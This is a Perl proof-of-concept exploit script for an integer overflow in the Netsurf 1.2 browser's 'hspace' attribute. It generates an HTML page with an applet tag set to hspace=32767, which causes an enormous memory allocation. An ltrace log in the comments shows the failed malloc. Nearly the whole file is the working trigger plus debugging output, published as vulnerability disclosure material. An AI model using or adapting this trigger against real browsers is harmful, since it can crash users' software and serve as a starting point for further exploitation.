|
#!/usr/bin/perl
# netsurf_hspace_intof1.pl
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# [ltrace log -- hspace = 30000, without --sync]
#
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
# = 0x8cbda01
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
# = 0
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)
# = 0
# cairo_clip(0xb6600948, 0, 0, 0, 0)
# = 0xb6600aec
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
# = 0x8cbda01
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
# malloc(3073536192) /// HUGE MALLOC
# = NULL
# <... gdk_pixbuf_get_from_drawable resumed> )
# = 0
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
# free(0xb6600dc8)
# = <void>
# free(0xb6600de0)
# = <void>
#
# Adv Ref: netsurf_multiple_adv.txt
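use strict;
use warnings;

# Output path for the generated test page. The original used the 2-arg
# form of open(), where a path beginning with a mode character such as
# '>' or '|' would change how the file is opened; the 3-arg open below
# pins the mode explicitly.
my $filename = $ARGV[0];
if (!defined($filename)) {
    print "Usage: $0 <filename.html>\n";
    exit 1;    # previously fell through and tried to write to an undefined path
}

# Minimal page holding one element whose hspace attribute is the test value.
my $head = "<html>" . "\n";
my $trig = "<applet code=\"test.class\" hspace=\"32767\">" . "\n";
#$trig = "<img src=\"test.jpg\" hspace=\"32767\">" . "\n";
my $foot = "</html>";
my $data = $head . $trig . $foot;

open(my $fh, '>', $filename) or die "open $filename: $!\n";
print {$fh} $data;
close($fh) or die "close $filename: $!\n";    # buffered write errors surface at close
exit;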
|